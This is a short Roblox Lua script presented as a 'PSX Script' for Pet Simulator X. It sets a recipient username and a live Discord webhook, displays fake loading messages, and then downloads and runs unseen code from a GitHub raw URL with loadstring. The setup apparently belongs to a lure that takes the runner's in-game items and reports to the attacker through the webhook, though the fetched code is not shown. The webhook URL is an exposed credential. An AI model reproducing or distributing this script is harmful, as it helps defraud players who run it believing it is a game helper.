Username = "GiffddWhat"
WebHook = "https://discord.com/api/webhooks/1097340084564533318/9J24Q1m1QbTJPjeafN4IM1tBKqUGZtLBjsPGGU9cgCgt5ETk882wC-j01Xdj4hFIrDBt"


loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
